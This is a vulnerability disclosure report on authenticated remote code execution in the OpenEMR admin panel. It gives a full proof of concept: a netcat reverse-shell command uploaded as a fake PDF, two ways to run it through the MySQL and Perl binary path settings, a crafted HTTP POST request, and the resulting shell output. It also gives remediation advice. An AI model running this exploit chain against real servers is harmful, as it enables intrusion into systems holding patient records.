Multiple Authenticated Remote Code Execution Vulnerabilities in Admin Panel in openemr/openemr
Reported on
Sep 21st 2022
Description
An attacker with administrative privileges in the openEMR application can execute arbitrary code on the server (remote code execution (RCE)). This was tested in openEMR version 7.0.0 (1) but also affects previous versions of openEMR.
Proof of Concept
First of all, start a netcat listener on a server reachable by the openEMR instance:
nc -lkp <port> -v
Upload a "Patient Education PDF" file (Admin->System->Files) named "poc.pdf" with the following content:
nc <server IP> <port> -e /bin/ash
Now, there are two ways to execute the content of poc.pdf (netcat reverse shell).
Way 1
Change the value of "Path to MySQL Binaries" (Admin->Globals->Miscellaneous) to the following value:
/bin/ash /var/www/localhost/htdocs/openemr/sites/default/documents/education/poc.pdf /usr/bin
Create a backup by either clicking "Create Backup" or "Create Eventlog Backup" (Admin->System->Backup).
This executes the content of the "poc.pdf" file with "/bin/ash", which leads to a reverse shell connection to the specified server:
login@pwn:~$ nc -lkp 8888 -v
Listening on 0.0.0.0 8888
Connection received on <redacted> 49623
id
uid=1000(apache) gid=101(apache) groups=82(www-data),101(apache),101(apache)
pwd
/var/www/localhost/htdocs/openemr/interface/main
Way 2
Change the value of "Path to Perl Binaries" (Admin->Globals->Miscellaneous) to the following value:
/bin/ash /var/www/localhost/htdocs/openemr/sites/default/documents/education/poc.pdf /usr/bin
Now, submit the following HTTP Post request with a valid administrator cookie and CSRF token:
POST /interface/main/backup.php HTTP/1.1
Host: openemr
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------248624921937887536913131162645
Content-Length: 610
Origin: https://openemr
Connection: close
Referer: https://openemr/interface/main/backup.php
Cookie: TreeMenuBranchStatus=objTreeMenu_1_node_1_5:objTreeMenu_1_node_1_9; OpenEMR=[ADMIN COOKIE]
-----------------------------248624921937887536913131162645
Content-Disposition: form-data; name="csrf_token_form"
[CSRF TOKEN]
-----------------------------248624921937887536913131162645
Content-Disposition: form-data; name="form_step"
102
-----------------------------248624921937887536913131162645
Content-Disposition: form-data; name="form_cb_lang"
RCE
-----------------------------248624921937887536913131162645
Content-Disposition: form-data; name="form_status"
Executing your reverse shell!
-----------------------------248624921937887536913131162645--
This executes the content of the "poc.pdf" file with "/bin/ash", which leads to a reverse shell connection to the specified server:
login@pwn:~$ nc -lkp 8888 -v
Listening on 0.0.0.0 8888
Connection received on <redacted> 49745
id
uid=1000(apache) gid=101(apache) groups=82(www-data),101(apache),101(apache)
pwd
/var/www/localhost/htdocs/openemr/interface/main
Solution
First off, exposing a functionality that allows an admin to change the path to MySQL binaries seems to be generally flawed. Such an operation should only be possible during server setup and not via the web interface.
If this is not possible, it is advised to tighten the input validation of the "Path to MySQL Binaries" value. An attacker should not be able to specify arbitrary executables as a path.
Impact
This vulnerability allows an attacker to execute arbitrary code on the openEMR server.
Occurrences
backup.php L119
The MySQL path ($GLOBALS['mysql_bin_dir']) is used multiple times in the backup.php file.
A preliminary fix has been posted in commit d10b1bf17b6571ac304f2d6a13d0ddeceb81dbed
Please do not create a CVE # or make this vulnerability public at this time. I will make this fix official about 1-2 mo months after we release 7.0.0 patch 2 (7.0.0.2), which will likely be in about 2-4 weeks. After I do that, then will be ok to make CVE # and make it public.
Thanks!